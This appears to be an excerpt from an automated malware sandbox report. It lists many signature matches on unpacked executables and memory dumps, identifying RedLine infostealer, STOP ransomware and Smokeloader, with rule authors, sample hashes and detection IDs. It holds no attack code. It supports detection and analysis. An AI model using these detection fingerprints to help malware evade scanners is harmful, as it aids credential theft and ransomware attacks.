Source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000000.510855251.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.539352220.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000000.426588359.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000E.00000000.432265249.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.505257421.00000000007A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.473163211.00000000022D7000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.357053208.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.512998427.0000000000968000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000000.507812417.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000000.430084061.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.468874148.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
